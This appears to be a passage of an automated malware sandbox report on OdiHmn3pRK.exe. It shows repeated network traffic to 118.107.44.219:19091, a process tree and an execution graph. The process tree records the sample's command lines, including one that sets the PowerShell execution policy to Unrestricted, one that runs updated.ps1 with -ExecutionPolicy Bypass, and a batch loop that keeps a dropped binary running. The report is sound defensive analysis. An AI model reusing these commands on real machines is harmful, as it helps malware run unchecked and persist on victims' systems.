                                                                Dec 27, 2024 13:10:25.769900084 CET1909149795118.107.44.219192.168.2.4
                                                                Dec 27, 2024 13:10:25.769957066 CET4979519091192.168.2.4118.107.44.219
                                                                Dec 27, 2024 13:10:25.770039082 CET1909149795118.107.44.219192.168.2.4
                                                                Dec 27, 2024 13:10:25.778269053 CET1909149795118.107.44.219192.168.2.4
                                                                Dec 27, 2024 13:10:25.778389931 CET1909149795118.107.44.219192.168.2.4
                                                                Dec 27, 2024 13:10:25.778444052 CET4979519091192.168.2.4118.107.44.219
                                                                Dec 27, 2024 13:10:25.786612034 CET1909149795118.107.44.219192.168.2.4
                                                                Dec 27, 2024 13:10:25.786667109 CET4979519091192.168.2.4118.107.44.219
                                                                Dec 27, 2024 13:10:25.786716938 CET1909149795118.107.44.219192.168.2.4
                                                                Dec 27, 2024 13:10:25.794996023 CET1909149795118.107.44.219192.168.2.4
                                                                Dec 27, 2024 13:10:25.795088053 CET1909149795118.107.44.219192.168.2.4
                                                                Dec 27, 2024 13:10:25.795115948 CET4979519091192.168.2.4118.107.44.219
                                                                Dec 27, 2024 13:10:25.803368092 CET1909149795118.107.44.219192.168.2.4
                                                                Dec 27, 2024 13:10:25.803422928 CET4979519091192.168.2.4118.107.44.219
                                                                Dec 27, 2024 13:10:25.803519011 CET1909149795118.107.44.219192.168.2.4
                                                                Dec 27, 2024 13:10:25.843815088 CET1909149795118.107.44.219192.168.2.4
                                                                Dec 27, 2024 13:10:25.843884945 CET4979519091192.168.2.4118.107.44.219
                                                                Dec 27, 2024 13:10:25.925128937 CET1909149795118.107.44.219192.168.2.4
                                                                Dec 27, 2024 13:10:25.933429956 CET1909149795118.107.44.219192.168.2.4
                                                                Dec 27, 2024 13:10:25.933443069 CET1909149795118.107.44.219192.168.2.4
                                                                Dec 27, 2024 13:10:25.933485031 CET4979519091192.168.2.4118.107.44.219
                                                                Dec 27, 2024 13:10:25.935852051 CET1909149795118.107.44.219192.168.2.4
                                                                Dec 27, 2024 13:10:25.935913086 CET4979519091192.168.2.4118.107.44.219
                                                                Dec 27, 2024 13:10:25.935946941 CET1909149795118.107.44.219192.168.2.4
                                                                Dec 27, 2024 13:10:25.941205978 CET1909149795118.107.44.219192.168.2.4
                                                                Dec 27, 2024 13:10:25.941263914 CET4979519091192.168.2.4118.107.44.219
                                                                Dec 27, 2024 13:10:25.943183899 CET1909149795118.107.44.219192.168.2.4
                                                                Dec 27, 2024 13:10:25.943280935 CET1909149795118.107.44.219192.168.2.4
                                                                Dec 27, 2024 13:10:25.943335056 CET4979519091192.168.2.4118.107.44.219
                                                                Dec 27, 2024 13:10:25.948520899 CET1909149795118.107.44.219192.168.2.4
                                                                Dec 27, 2024 13:10:25.948695898 CET1909149795118.107.44.219192.168.2.4
                                                                Dec 27, 2024 13:10:25.948765039 CET4979519091192.168.2.4118.107.44.219
                                                                Dec 27, 2024 13:10:25.953936100 CET1909149795118.107.44.219192.168.2.4
                                                                Dec 27, 2024 13:10:25.954015970 CET1909149795118.107.44.219192.168.2.4
                                                                Dec 27, 2024 13:10:25.954219103 CET4979519091192.168.2.4118.107.44.219
                                                                Dec 27, 2024 13:10:25.959249020 CET1909149795118.107.44.219192.168.2.4
                                                                Dec 27, 2024 13:10:25.959355116 CET1909149795118.107.44.219192.168.2.4
                                                                Dec 27, 2024 13:10:25.959470034 CET4979519091192.168.2.4118.107.44.219


Target ID: 0
Start time: 07:09:02
Start date: 27/12/2024
Path: C:\Users\user\Desktop\OdiHmn3pRK.exe
Wow64 process (32bit): true
Commandline: "C:\Users\user\Desktop\OdiHmn3pRK.exe"
Imagebase: 0x400000
File size: 36'618'436 bytes
MD5 hash: 11933D4B44331258739282E769CA4914
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: low
Has exited: true

Target ID: 1
Start time: 07:09:08
Start date: 27/12/2024
Path: C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit): true
Commandline: "C:\Windows\System32\cmd.exe" /c start C:\Users\Public\Bilite\Axialis\kwpswnsserver.exe
Imagebase: 0x240000
File size: 236'544 bytes
MD5 hash: D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Target ID: 2
Start time: 07:09:08
Start date: 27/12/2024
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff7699e0000
File size: 862'208 bytes
MD5 hash: 0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Target ID: 3
Start time: 07:09:08
Start date: 27/12/2024
Path: C:\Users\Public\Bilite\Axialis\kwpswnsserver.exe
Wow64 process (32bit): true
                                                                Commandline:C:\Users\Public\Bilite\Axialis\kwpswnsserver.exe
                                                                Imagebase:0x4a0000
                                                                File size:315'264 bytes
                                                                MD5 hash:607336E586D1BD00DCF1CA7EED97A8DB
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Antivirus matches:
                                                                • Detection: 0%, ReversingLabs
                                                                Reputation:low
                                                                Has exited:false

                                                                Target ID:8
                                                                Start time:07:10:18
                                                                Start date:27/12/2024
                                                                Path:C:\Windows\SysWOW64\cmd.exe
                                                                Wow64 process (32bit):true
                                                                Commandline:cmd.exe /B /c "C:\Users\user\AppData\Local\Temp\\monitor.bat"
                                                                Imagebase:0x240000
                                                                File size:236'544 bytes
                                                                MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Reputation:high
                                                                Has exited:false

                                                                Target ID:9
                                                                Start time:07:10:18
                                                                Start date:27/12/2024
                                                                Path:C:\Windows\System32\conhost.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                Imagebase:0x7ff7699e0000
                                                                File size:862'208 bytes
                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Reputation:high
                                                                Has exited:false

                                                                Target ID:10
                                                                Start time:07:10:18
                                                                Start date:27/12/2024
                                                                Path:C:\Windows\SysWOW64\tasklist.exe
                                                                Wow64 process (32bit):true
                                                                Commandline:tasklist /FI "IMAGENAME eq kwpswnsserver.exe"
                                                                Imagebase:0xc60000
                                                                File size:79'360 bytes
                                                                MD5 hash:0A4448B31CE7F83CB7691A2657F330F1
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Reputation:high
                                                                Has exited:true

                                                                Target ID:11
                                                                Start time:07:10:18
                                                                Start date:27/12/2024
                                                                Path:C:\Windows\SysWOW64\findstr.exe
                                                                Wow64 process (32bit):true
                                                                Commandline:findstr /I "kwpswnsserver.exe"
                                                                Imagebase:0xb10000
                                                                File size:29'696 bytes
                                                                MD5 hash:F1D4BE0E99EC734376FDE474A8D4EA3E
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Reputation:high
                                                                Has exited:true

                                                                Target ID:12
                                                                Start time:07:10:18
                                                                Start date:27/12/2024
                                                                Path:C:\Windows\SysWOW64\timeout.exe
                                                                Wow64 process (32bit):true
                                                                Commandline:timeout /t 30 /nobreak
                                                                Imagebase:0xfb0000
                                                                File size:25'088 bytes
                                                                MD5 hash:976566BEEFCCA4A159ECBDB2D4B1A3E3
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Reputation:high
                                                                Has exited:true

                                                                Target ID:13
                                                                Start time:07:10:19
                                                                Start date:27/12/2024
                                                                Path:C:\Windows\SysWOW64\cmd.exe
                                                                Wow64 process (32bit):true
                                                                Commandline:cmd.exe /C powershell -Command "Set-ExecutionPolicy Unrestricted -Scope CurrentUser"
                                                                Imagebase:0x240000
                                                                File size:236'544 bytes
                                                                MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Reputation:high
                                                                Has exited:true

                                                                Target ID:14
                                                                Start time:07:10:19
                                                                Start date:27/12/2024
                                                                Path:C:\Windows\SysWOW64\cmd.exe
                                                                Wow64 process (32bit):true
                                                                Commandline:cmd.exe /C powershell -ExecutionPolicy Bypass -File C:\Users\user\AppData\Local\updated.ps1
                                                                Imagebase:0x240000
                                                                File size:236'544 bytes
                                                                MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Has exited:true

                                                                Target ID:15
                                                                Start time:07:10:19
                                                                Start date:27/12/2024
                                                                Path:C:\Windows\System32\conhost.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                Imagebase:0x7ff7699e0000
                                                                File size:862'208 bytes
                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Has exited:true

                                                                Target ID:16
                                                                Start time:07:10:19
                                                                Start date:27/12/2024
                                                                Path:C:\Windows\System32\conhost.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                Imagebase:0x7ff7699e0000
                                                                File size:862'208 bytes
                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Has exited:true

                                                                Target ID:17
                                                                Start time:07:10:19
                                                                Start date:27/12/2024
                                                                Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                Wow64 process (32bit):true
                                                                Commandline:powershell -Command "Set-ExecutionPolicy Unrestricted -Scope CurrentUser"
                                                                Imagebase:0x6a0000
                                                                File size:433'152 bytes
                                                                MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Has exited:true

                                                                Target ID:18
                                                                Start time:07:10:19
                                                                Start date:27/12/2024
                                                                Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                Wow64 process (32bit):true
                                                                Commandline:powershell -ExecutionPolicy Bypass -File C:\Users\user\AppData\Local\updated.ps1
                                                                Imagebase:0x6a0000
                                                                File size:433'152 bytes
                                                                MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Has exited:true

                                                                Target ID:20
                                                                Start time:07:10:48
                                                                Start date:27/12/2024
                                                                Path:C:\Windows\SysWOW64\tasklist.exe
                                                                Wow64 process (32bit):true
                                                                Commandline:tasklist /FI "IMAGENAME eq kwpswnsserver.exe"
                                                                Imagebase:0xc60000
                                                                File size:79'360 bytes
                                                                MD5 hash:0A4448B31CE7F83CB7691A2657F330F1
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Has exited:true

                                                                Target ID:21
                                                                Start time:07:10:48
                                                                Start date:27/12/2024
                                                                Path:C:\Windows\SysWOW64\findstr.exe
                                                                Wow64 process (32bit):true
                                                                Commandline:findstr /I "kwpswnsserver.exe"
                                                                Imagebase:0xb10000
                                                                File size:29'696 bytes
                                                                MD5 hash:F1D4BE0E99EC734376FDE474A8D4EA3E
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Has exited:true

                                                                Target ID:22
                                                                Start time:07:10:48
                                                                Start date:27/12/2024
                                                                Path:C:\Windows\SysWOW64\timeout.exe
                                                                Wow64 process (32bit):true
                                                                Commandline:timeout /t 30 /nobreak
                                                                Imagebase:0xfb0000
                                                                File size:25'088 bytes
                                                                MD5 hash:976566BEEFCCA4A159ECBDB2D4B1A3E3
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Has exited:true

                                                                Target ID:23
                                                                Start time:07:11:18
                                                                Start date:27/12/2024
                                                                Path:C:\Windows\SysWOW64\tasklist.exe
                                                                Wow64 process (32bit):true
                                                                Commandline:tasklist /FI "IMAGENAME eq kwpswnsserver.exe"
                                                                Imagebase:0xc60000
                                                                File size:79'360 bytes
                                                                MD5 hash:0A4448B31CE7F83CB7691A2657F330F1
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Has exited:true

                                                                Target ID:24
                                                                Start time:07:11:18
                                                                Start date:27/12/2024
                                                                Path:C:\Windows\SysWOW64\findstr.exe
                                                                Wow64 process (32bit):true
                                                                Commandline:findstr /I "kwpswnsserver.exe"
                                                                Imagebase:0xb10000
                                                                File size:29'696 bytes
                                                                MD5 hash:F1D4BE0E99EC734376FDE474A8D4EA3E
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Has exited:true

                                                                Target ID:25
                                                                Start time:07:11:18
                                                                Start date:27/12/2024
                                                                Path:C:\Windows\SysWOW64\timeout.exe
                                                                Wow64 process (32bit):true
                                                                Commandline:timeout /t 30 /nobreak
                                                                Imagebase:0xfb0000
                                                                File size:25'088 bytes
                                                                MD5 hash:976566BEEFCCA4A159ECBDB2D4B1A3E3
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Has exited:true

                                                                Target ID:26
                                                                Start time:07:11:48
                                                                Start date:27/12/2024
                                                                Path:C:\Windows\SysWOW64\tasklist.exe
                                                                Wow64 process (32bit):true
                                                                Commandline:tasklist /FI "IMAGENAME eq kwpswnsserver.exe"
                                                                Imagebase:0xc60000
                                                                File size:79'360 bytes
                                                                MD5 hash:0A4448B31CE7F83CB7691A2657F330F1
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Has exited:true

                                                                Target ID:27
                                                                Start time:07:11:48
                                                                Start date:27/12/2024
                                                                Path:C:\Windows\SysWOW64\findstr.exe
                                                                Wow64 process (32bit):true
                                                                Commandline:findstr /I "kwpswnsserver.exe"
                                                                Imagebase:0xb10000
                                                                File size:29'696 bytes
                                                                MD5 hash:F1D4BE0E99EC734376FDE474A8D4EA3E
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Has exited:true

                                                                Target ID:28
                                                                Start time:07:11:48
                                                                Start date:27/12/2024
                                                                Path:C:\Windows\SysWOW64\timeout.exe
                                                                Wow64 process (32bit):true
                                                                Commandline:timeout /t 30 /nobreak
                                                                Imagebase:0xfb0000
                                                                File size:25'088 bytes
                                                                MD5 hash:976566BEEFCCA4A159ECBDB2D4B1A3E3
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Has exited:false

                                                                  Execution Graph

                                                                  Execution Coverage:17.9%
                                                                  Dynamic/Decrypted Code Coverage:0%
                                                                  Signature Coverage:26.8%
                                                                  Total number of Nodes:1428
                                                                  Total number of Limit Nodes:15
8552->8550 8552->8554 8553 4019a7 SetLastError 8553->8468 8554->8550 8554->8553 8556 401f9d 19 API calls 8555->8556 8557 40778a wvsprintfW 8556->8557 8558 407859 8557->8558 8559 4077ab GetLastError FormatMessageW 8557->8559 8562 4076a8 25 API calls 8558->8562 8560 4077d9 FormatMessageW 8559->8560 8561 4077ee lstrlenW lstrlenW ??2@YAPAXI lstrcpyW lstrcpyW 8559->8561 8560->8558 8560->8561 8566 4076a8 8561->8566 8564 407865 8562->8564 8564->8483 8567 407715 ??3@YAXPAX LocalFree 8566->8567 8568 4076b7 8566->8568 8567->8564 8569 40661a 2 API calls 8568->8569 8570 4076c6 IsWindow 8569->8570 8571 4076ef 8570->8571 8572 4076dd IsBadReadPtr 8570->8572 8573 4073d1 21 API calls 8571->8573 8572->8571 8573->8567 8580 402c86 8574->8580 8576 402ff6 8577 403017 8576->8577 8578 402ffb GetLastError 8576->8578 8577->8493 8579 403006 8578->8579 8579->8493 8581 402c93 GetFileAttributesW 8580->8581 8582 402c8f 8580->8582 8583 402ca4 8581->8583 8584 402ca9 8581->8584 8582->8576 8583->8576 8585 402cc7 8584->8585 8586 402cad SetFileAttributesW 8584->8586 8591 402b79 8585->8591 8588 402cc3 8586->8588 8589 402cba DeleteFileW 8586->8589 8588->8576 8589->8576 8592 4024fc 2 API calls 8591->8592 8593 402b90 8592->8593 8594 40254d 2 API calls 8593->8594 8595 402b9d FindFirstFileW 8594->8595 8596 402c55 SetFileAttributesW 8595->8596 8609 402bbf 8595->8609 8598 402c60 RemoveDirectoryW 8596->8598 8599 402c78 ??3@YAXPAX 8596->8599 8597 401329 2 API calls 8597->8609 8598->8599 8600 402c6d ??3@YAXPAX 8598->8600 8601 402c80 8599->8601 8600->8601 8601->8576 8603 40254d 2 API calls 8603->8609 8604 402c24 SetFileAttributesW 8604->8599 8606 402c2d DeleteFileW 8604->8606 8605 402bef lstrcmpW 8607 402c05 lstrcmpW 8605->8607 8608 402c38 FindNextFileW 8605->8608 8606->8609 8607->8608 8607->8609 8608->8609 8610 402c4e FindClose 8608->8610 8609->8597 8609->8599 8609->8603 8609->8604 8609->8605 8609->8608 8611 402b79 2 API calls 8609->8611 8612 401429 8609->8612 8610->8596 8611->8609 8613 401398 2 API calls 
8612->8613 8614 401433 8613->8614 8614->8609 8616 40db1f 2 API calls 8615->8616 8617 401857 8616->8617 8617->8401 8617->8402 8619 40af0c 8618->8619 8634 408ebd 8618->8634 8619->8634 8711 40ac7a 8619->8711 8621 40af3f 8622 40ac7a 7 API calls 8621->8622 8623 40b0cb 8621->8623 8627 40af96 8622->8627 8625 40e959 ctype 4 API calls 8623->8625 8624 40afbd 8718 40e959 8624->8718 8625->8634 8627->8623 8627->8624 8628 40b043 8631 40e959 ctype 4 API calls 8628->8631 8629 408761 _CxxThrowException ??2@YAPAXI memcpy ??3@YAXPAX 8630 40afc6 8629->8630 8630->8628 8630->8629 8632 40b07f 8631->8632 8633 40e959 ctype 4 API calls 8632->8633 8633->8634 8634->8298 8635 4065ea InitializeCriticalSection 8634->8635 8635->8310 8730 4086f0 8636->8730 8679 40cdc7 8678->8679 8680 408761 4 API calls 8679->8680 8681 40cdde 8680->8681 8681->8310 8712 40e8da ctype 3 API calls 8711->8712 8713 40ac86 8712->8713 8722 40e811 8713->8722 8715 40aca2 8715->8621 8716 409403 4 API calls 8717 40ac90 8716->8717 8717->8715 8717->8716 8719 40e93b 8718->8719 8720 40e8da ctype 3 API calls 8719->8720 8721 40e943 ??3@YAXPAX 8720->8721 8721->8630 8723 40e8a5 8722->8723 8724 40e824 8722->8724 8723->8717 8725 40e833 _CxxThrowException 8724->8725 8726 40e863 ??2@YAPAXI 8724->8726 8727 40e895 ??3@YAXPAX 8724->8727 8725->8724 8726->8724 8728 40e879 memcpy 8726->8728 8727->8723 8728->8727 8731 40e8da ctype 3 API calls 8730->8731 8732 4086f8 8731->8732 8733 40e8da ctype 3 API calls 8732->8733 8734 408700 8733->8734 8735 40e8da ctype 3 API calls 8734->8735 8736 408708 8735->8736 9107 40dace 9110 40daac 9107->9110 9113 40da8f 9110->9113 9114 40da56 2 API calls 9113->9114 9115 40daa9 9114->9115 9090 40dadc ReadFile 9116 411def __set_app_type __p__fmode __p__commode 9117 411e5e 9116->9117 9118 411e72 9117->9118 9119 411e66 __setusermatherr 9117->9119 9128 411f66 _controlfp 9118->9128 9119->9118 9121 411e77 _initterm __getmainargs _initterm 9122 411ecb GetStartupInfoA 9121->9122 9124 411eff GetModuleHandleA 9122->9124 9129 
4064af _EH_prolog 9124->9129 9128->9121 9132 404faa 9129->9132 9437 401b37 GetModuleHandleW CreateWindowExW 9132->9437 9135 404fdc 9136 40648e MessageBoxA 9135->9136 9138 404ff6 9135->9138 9137 4064a5 exit _XcptFilter 9136->9137 9139 401411 2 API calls 9138->9139 9140 40502d 9139->9140 9141 401411 2 API calls 9140->9141 9142 405035 9141->9142 9440 403e23 9142->9440 9147 40254d 2 API calls 9148 405073 9147->9148 9449 402a69 9148->9449 9150 40507c 9463 403d71 9150->9463 9154 40509b _wtol 9156 4050b1 9154->9156 9155 4050d6 9157 403d71 6 API calls 9155->9157 9468 404405 9156->9468 9158 4050e1 9157->9158 9159 4050e7 9158->9159 9160 405118 9158->9160 9625 404996 9159->9625 9161 405130 GetModuleFileNameW 9160->9161 9163 40112b 2 API calls 9160->9163 9164 405151 9161->9164 9165 405142 9161->9165 9163->9161 9170 403d71 6 API calls 9164->9170 9166 407776 55 API calls 9165->9166 9175 4050ec 9166->9175 9167 4050ee ??3@YAXPAX 9643 403e70 9167->9643 9169 4050ff ??3@YAXPAX ??3@YAXPAX 9169->9137 9183 405173 9170->9183 9171 4052d5 9172 401362 2 API calls 9171->9172 9173 4052e5 9172->9173 9174 401362 2 API calls 9173->9174 9178 4052f2 9174->9178 9175->9167 9176 4051fa 9176->9175 9177 40522a 9176->9177 9180 405213 _wtol 9176->9180 9181 403d71 6 API calls 9177->9181 9179 40538d ??2@YAPAXI 9178->9179 9182 401329 2 API calls 9178->9182 9189 405399 9179->9189 9180->9177 9187 405289 9181->9187 9184 405327 9182->9184 9183->9171 9183->9175 9183->9176 9183->9177 9186 401429 2 API calls 9183->9186 9185 401329 2 API calls 9184->9185 9191 40533d 9185->9191 9186->9183 9187->9171 9188 404594 2 API calls 9187->9188 9190 4052ba 9188->9190 9192 4053cf 9189->9192 9196 407776 55 API calls 9189->9196 9190->9171 9194 401362 2 API calls 9190->9194 9195 401362 2 API calls 9191->9195 9493 4025ae 9192->9493 9194->9171 9198 405367 9195->9198 9196->9192 9200 401f9d 19 API calls 9198->9200 9199 4025ae 2 API calls 9201 4053f6 9199->9201 9202 40536e 9200->9202 9203 4025ae 2 API calls 9201->9203 9204 40254d 2 API 
calls 9202->9204 9206 4053fe 9203->9206 9205 405377 9204->9205 9205->9179 9496 404e3f 9206->9496 9211 40546f 9212 405534 9211->9212 9215 403d71 6 API calls 9211->9215 9214 40e8da ctype 3 API calls 9212->9214 9213 402844 10 API calls 9216 405441 9213->9216 9217 40553c 9214->9217 9218 405493 9215->9218 9216->9211 9219 407776 55 API calls 9216->9219 9220 405573 9217->9220 9674 403093 9217->9674 9218->9212 9229 40549d 9218->9229 9221 405450 ??3@YAXPAX ??3@YAXPAX ??3@YAXPAX 9219->9221 9223 405506 ??3@YAXPAX ??3@YAXPAX ??3@YAXPAX 9220->9223 9224 40557c 9220->9224 9221->9211 9223->9167 9223->9175 9227 405588 wsprintfW 9224->9227 9228 4055ed 9224->9228 9235 401411 2 API calls 9224->9235 9237 401329 ??2@YAPAXI ??3@YAXPAX 9224->9237 9239 401f9d 19 API calls 9224->9239 9708 402f6c ??2@YAPAXI 9224->9708 9714 402425 ??3@YAXPAX ??3@YAXPAX 9224->9714 9226 405556 ??3@YAXPAX ??3@YAXPAX ??3@YAXPAX 9230 4054f5 9226->9230 9231 401411 2 API calls 9227->9231 9524 404603 9228->9524 9229->9223 9648 404cbc 9229->9648 9230->9223 9231->9224 9234 4054cc 9234->9223 9236 407776 55 API calls 9234->9236 9235->9224 9238 4054da ??3@YAXPAX ??3@YAXPAX ??3@YAXPAX 9236->9238 9237->9224 9238->9230 9239->9224 9240 40584a 9241 404603 26 API calls 9240->9241 9273 40586a 9241->9273 9245 405933 9586 404034 9245->9586 9246 4024fc 2 API calls 9246->9273 9250 4059d8 CoInitialize 9256 40243b lstrcmpW 9250->9256 9251 40595a 9254 40243b lstrcmpW 9251->9254 9252 405935 ??3@YAXPAX 9252->9245 9255 405969 9254->9255 9257 405979 9255->9257 9260 401f9d 19 API calls 9255->9260 9258 4059fe 9256->9258 9741 403b40 9257->9741 9261 405a12 9258->9261 9264 401329 2 API calls 9258->9264 9259 401411 ??2@YAPAXI ??3@YAXPAX 9259->9273 9260->9257 9592 403b59 9261->9592 9263 401362 2 API calls 9263->9273 9264->9261 9268 4073d1 21 API calls 9272 40599c ctype 9268->9272 9269 401329 2 API calls 9269->9273 9270 4055f6 9270->9240 9280 403b94 lstrlenW lstrlenW _wcsnicmp 9270->9280 9284 4057dd _wtol 9270->9284 9299 405878 ??3@YAXPAX 
??3@YAXPAX ??3@YAXPAX 9270->9299 9715 40484d 9270->9715 9726 40408b 9270->9726 9271 405a4d 9277 405a2b ??3@YAXPAX ??3@YAXPAX ??3@YAXPAX 9271->9277 9313 405a61 9271->9313 9761 4082e9 9271->9761 9278 4059a7 ??3@YAXPAX ??3@YAXPAX ??3@YAXPAX 9272->9278 9273->9245 9273->9246 9273->9252 9273->9259 9273->9263 9273->9269 9276 402f6c 7 API calls 9273->9276 9583 40243b 9273->9583 9740 402425 ??3@YAXPAX ??3@YAXPAX 9273->9740 9276->9273 9277->9271 9278->9175 9280->9270 9281 405910 ??3@YAXPAX 9281->9273 9282 401411 2 API calls 9282->9313 9284->9270 9285 405bd8 ??3@YAXPAX ??3@YAXPAX ??3@YAXPAX 9306 405bf3 9285->9306 9286 405a9f GetKeyState 9286->9313 9287 405c6c 9290 405ca2 9287->9290 9291 405c74 9287->9291 9288 401329 ??2@YAPAXI ??3@YAXPAX 9288->9313 9289 40243b lstrcmpW 9289->9313 9294 4012f7 2 API calls 9290->9294 9803 403f85 9291->9803 9297 405cb0 9294->9297 9300 403b59 15 API calls 9297->9300 9298 401362 2 API calls 9304 405c91 ??3@YAXPAX 9298->9304 9299->9175 9302 405cb9 9300->9302 9301 407776 55 API calls 9303 405c13 ??3@YAXPAX ??3@YAXPAX ??3@YAXPAX ??3@YAXPAX 9301->9303 9305 405cca ??3@YAXPAX 9302->9305 9309 401362 2 API calls 9302->9309 9303->9306 9310 405cd9 9304->9310 9305->9310 9306->9301 9307 405c4a ??3@YAXPAX ??3@YAXPAX ??3@YAXPAX ??3@YAXPAX 9306->9307 9307->9306 9308 405bcd ??3@YAXPAX 9308->9313 9309->9305 9311 405d24 9310->9311 9312 405d16 9310->9312 9816 40786b 9311->9816 9599 404a44 9312->9599 9313->9282 9313->9285 9313->9286 9313->9287 9313->9288 9313->9289 9313->9306 9313->9307 9313->9308 9316 401429 ??2@YAPAXI ??3@YAXPAX 9313->9316 9788 407613 9313->9788 9797 407674 9313->9797 9316->9313 9317 405d20 9318 405d65 9317->9318 9822 403e0d 9317->9822 9319 404034 21 API calls 9318->9319 9321 405d77 9319->9321 9323 406373 9321->9323 9324 401411 2 API calls 9321->9324 9326 4063f7 ctype 9323->9326 9329 40243b lstrcmpW 9323->9329 9325 405d95 9324->9325 9369 405da8 9325->9369 9826 40453e 9325->9826 9328 40643a ??3@YAXPAX ??3@YAXPAX ??3@YAXPAX ??3@YAXPAX 9326->9328 9334 
40243b lstrcmpW 9326->9334 9330 406461 9328->9330 9331 406467 ??3@YAXPAX 9328->9331 9332 4063a4 9329->9332 9330->9331 9333 403e70 ctype 4 API calls 9331->9333 9332->9326 9853 403f48 9332->9853 9335 406478 ??3@YAXPAX ??3@YAXPAX 9333->9335 9337 406416 9334->9337 9335->9137 9336 401411 ??2@YAPAXI ??3@YAXPAX 9336->9369 9337->9328 9341 406423 9337->9341 9340 405dd8 9343 405de5 9340->9343 9344 4061fa ??3@YAXPAX ??3@YAXPAX 9340->9344 9346 4012f7 2 API calls 9341->9346 9342 4073d1 21 API calls 9347 4063e0 ??3@YAXPAX 9342->9347 9835 4043c6 9343->9835 9348 406312 9344->9348 9345 40243b lstrcmpW 9345->9369 9350 406432 9346->9350 9347->9326 9354 40636a ??3@YAXPAX 9348->9354 9355 404034 21 API calls 9348->9355 9858 404aff 9350->9858 9353 405e45 9357 401329 2 API calls 9353->9357 9354->9323 9359 406321 9355->9359 9360 405e4e 9357->9360 9358 4043c6 2 API calls 9361 405e0e 9358->9361 9843 4048ab 9359->9843 9365 403b7f 19 API calls 9360->9365 9366 401362 2 API calls 9361->9366 9363 40626b ??3@YAXPAX ??3@YAXPAX 9363->9348 9364 401329 2 API calls 9364->9369 9383 405e57 9365->9383 9367 405e1a ??3@YAXPAX ??3@YAXPAX GetFileAttributesW 9366->9367 9370 406211 9367->9370 9371 405e41 9367->9371 9368 40633a SetCurrentDirectoryW 9372 4048ab 4 API calls 9368->9372 9369->9336 9369->9340 9369->9345 9369->9353 9369->9363 9369->9364 9373 401429 2 API calls 9369->9373 9376 403e0d 16 API calls 9370->9376 9371->9353 9374 406362 9372->9374 9375 405ee5 ??3@YAXPAX ??3@YAXPAX 9373->9375 9377 403e0d 16 API calls 9374->9377 9375->9369 9378 406216 9376->9378 9377->9354 9379 407776 55 API calls 9378->9379 9380 40621f 7 API calls 9379->9380 9381 40625e 9380->9381 9381->9363 9382 403bce lstrlenW lstrlenW _wcsnicmp 9382->9383 9383->9382 9384 405f61 _wtol 9383->9384 9385 406025 9383->9385 9384->9383 9386 406080 9385->9386 9387 40602e 9385->9387 9388 401362 2 API calls 9386->9388 9389 406053 9387->9389 9390 406034 9387->9390 9391 40607e 9388->9391 9393 401329 2 API calls 9389->9393 9392 401329 2 API calls 
